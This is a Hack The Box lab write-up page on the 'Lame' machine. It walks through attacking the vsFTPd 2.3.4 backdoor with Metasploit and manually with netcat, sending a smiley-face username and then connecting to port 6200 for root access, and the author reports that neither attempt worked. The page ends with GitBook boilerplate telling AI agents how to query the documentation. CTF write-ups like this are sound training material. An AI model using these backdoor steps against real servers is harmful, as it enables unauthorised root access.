> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/lame/exploitation/ftp.md).

# FTP

* Since I found that the FTP version had an exploit available, I went over to Metasploit to try to use it.

```
msfconsole
```

```
search vsFTPd 2.3.4
```

<figure><img src="/files/ZKn04bc9bGpG5U5DPUeK" alt=""><figcaption></figcaption></figure>

* Looks like there is an excellent exploit available so let's give it a try.

```
use exploit/unix/ftp/vsftpd_234_backdoor
```

```
show options
```

```
set rhosts [Target IP]
```

```
exploit
```

* Unfortunately, a session was not created for some reason.
* I then attempted to try the exploit out manually.
* From your host terminal run the following.

```
nc [Target IP] 21
```

```
user [Type whatever username you want]:)
```

```
pass [Type whatever password you want]
```

* This exploit is actually a backdoor built into this version of FTP. All you have to do is add the smiley face at the end of the username you put in and it will allow you access.
* This has FTP open new port access on Port 6200.
* As soon as you are done doing the above then open a new terminal and run the following.

```
nc [Target IP] 6200
```

* It should take a little while but you should be able to then have root privileges to the account.
* Unfortunately, I couldn't get this to work either for some reason. I even reset the machine and tried on Parrot. No luck either way.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/lame/exploitation/ftp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.